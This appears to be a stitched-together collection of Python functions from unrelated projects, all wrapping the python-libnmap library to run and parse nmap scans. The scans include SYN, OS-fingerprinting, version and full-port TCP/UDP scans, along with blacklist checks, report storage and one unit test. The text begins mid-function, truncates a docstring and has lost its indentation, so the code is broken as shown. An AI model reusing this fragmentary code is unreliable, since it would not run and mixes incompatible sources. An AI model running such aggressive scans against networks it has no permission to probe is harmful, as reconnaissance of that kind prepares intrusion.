nmap_report = NmapParser.parse(nm.stdout)
return nmap_report
def run_scan_check_blacklist(self, target, options):
nmap_proc = NmapProcess(targets=target, options=options)
nmap_proc.run()
nmap_report_obj = NmapParser.parse(nmap_proc.stdout)
count = 0
for host in nmap_report_obj.hosts:
if host.status == "up" and host.address in self.blacklist:
count = count+1
return count
def __walk(self):
"""
information.
:yield: A list with the filtered values
:rtype: `list`
"""
for report in os.scandir(self.path):
if fnmatch.fnmatch(report.name, self.pattern):
try:
nmap_report = NmapParser.parse_fromfile(report.path)
yield from nmap_report.hosts
except NmapParserException as ex:
log.error(f"Error parsing {report} - {ex}")
def nmap_scan(hosts, outfile, add_args):
'''
Do Nmap scan
'''
nmap_args = '-sS -O -T4 -sV -n {} --max-retries 5 -oA {}'.format(
add_args, outfile)
print_info('Running: nmap {}'.format(nmap_args))
nmap_proc = NmapProcess(targets=hosts, options=nmap_args, safe_mode=False)
rc = nmap_proc.sudo_run_background()
nmap_status_printer(nmap_proc)
report = NmapParser.parse_fromfile(os.getcwd() + '/{}.xml'.format(outfile))
return report
def is_port_open(self, port):
nmproc = NmapProcess(str(self.ip), '-p ' + str(port))
rc = nmproc.run()
if rc != 0:
self.has_error("nmap scan failed: {0}".format(nmproc.stderr))
return False
else:
nmap_report = NmapParser.parse(nmproc.stdout)
if nmap_report.hosts[0].status == 'up':
return (nmap_report.hosts[0].services[0].state == 'open')
else:
return False
def parse_nmap_services(report):
nmap_svcs = []
if os.path.exists(report):
try:
report = NmapParser.parse_fromfile(report)
nmap_svcs += report.hosts[0].services
except NmapParserException as ex:
error(Fore.RED + '[' + Style.BRIGHT + 'nmap-udp ({address})' +
Style.NORMAL + '] ' + Fore.RESET +
'NmapParserException: {ex}')
return sorted(nmap_svcs, key=lambda s: s.port)
def getall(self, dict_filter=None):
"""
:rtype: List of tuple
:return: list of key/report
:todo: add a filter capability
"""
nmapreportlist = []
for key in bucket_lister(self.bucket):
if isinstance(key, Key):
nmapreportjson = json.loads(key.get_contents_as_string())
nmapreport = NmapParser.parse_fromdict(nmapreportjson)
nmapreportlist.append((key.key, nmapreport))
return nmapreportlist
def nmap_scan(self, file, fk):
progress_recorder = ProgressRecorder(self)
result = 0
print(os.getcwd() + file)
search = Search.objects.get(id=fk)
max_reader = maxminddb.open_database('GeoLite2-City.mmdb')
nmap_report = NmapParser.parse_fromfile(os.getcwd() + file)
total = len(nmap_report.hosts)
for c, i in enumerate(nmap_report.hosts):
result += c
nmap_host_worker(host_arg=i, max_reader=max_reader, search=search)
progress_recorder.set_progress(c + 1, total=total)
return result
def nmap_scan(ip, options):
parsed = None
nmproc = NmapProcess(ip, options)
rc = nmproc.run()
if rc != 0:
print("nmap scan failed: {0}".format(nmproc.stderr))
try:
parsed = NmapParser.parse(nmproc.stdout)
except NmapParserException as e:
print("Exception raised while parsing scan: {0}".format(e.msg))
return parsed
def run_nmap(address):
out = os.path.join(outdir, address)
run_cmds([
('nmap -v -sV -sC -T5 -p- -oN "' + out + '/0_tcp_nmap.txt" -oX "' +
out + '/0_tcp_nmap.xml" ' + address, 'nmap-tcp'),
('nmap -v -sV --version-intensity 0 -sC -sU -T5 -oN "' + out +
'/0_udp_nmap.txt" -oX "' + out + '/0_udp_nmap.xml" ' + address,
'nmap-udp')
])
nmap_svcs = []
if os.path.exists(out + '/0_tcp_nmap.xml'):
report = NmapParser.parse_fromfile(out + '/0_tcp_nmap.xml')
nmap_svcs += report.hosts[0].services
if os.path.exists(out + '/0_udp_nmap.xml'):
report = NmapParser.parse_fromfile(out + '/0_udp_nmap.xml')
nmap_svcs += report.hosts[0].services
services = []
nmap_svcs = sorted(nmap_svcs, key=lambda s: s.port)
for service in nmap_svcs:
if 'open' not in service.state:
continue
info(
'Service {bgreen}{service.port}{rst}/{bgreen}{service.protocol}{rst} is {bgreen}{service.service}{rst}'
+ (' running {green}' + service.service_dict['product'] +
'{crst}' if 'product' in service.service_dict else '') +
(' version {green}' + service.service_dict['version'] +
'{crst}' if 'version' in service.service_dict else ''))
services.append(
(address,
service.port * -1 if service.protocol == 'udp' else service.port,
service.service))
return services
def test_bannerdict(self):
nmapreport = NmapParser.parse_fromfile(
"{0}/files/dionaea_scan.xml".format(self.fdir))
dhttp = nmapreport.hosts[0].get_service(80)
dftp = nmapreport.hosts[0].get_service(21)
self.assertEqual(dhttp.banner_dict, {"product": "nginx"})
self.assertEqual(
dftp.banner_dict,
{
"product": "Synology DiskStation NAS ftpd",
"devicetype": "storage-misc",
},
)
def ip_info(subnet):
nm = NmapProcess(subnet, options="-Pn -O")
rc = nm.sudo_run()
if nm.rc == 0:
rep = NmapParser.parse(nm.stdout)
for host in rep.hosts:
if host.is_up():
print("IP Address: {0}".format(host.address))
if host.os_fingerprinted:
for osm in host.os.osmatches:
print("OS Type: {0}".format(osm.name))
print ("Last seen timestamp: {0}\n" .format(host.lastboot))
else:
print (nm.stderr)
def do_scan(ip,argm):
try:
nmap_report = None
nm = NmapProcess(ip, options=argm)
rc = nm.run()
if nm.rc == 0:
nmap_result=nm.stdout
nmap_report = NmapParser.parse_fromstring(nmap_result)
else:
logger.error(nm.stderr)
except Exception as e:
logger.error(e.message)
return nmap_report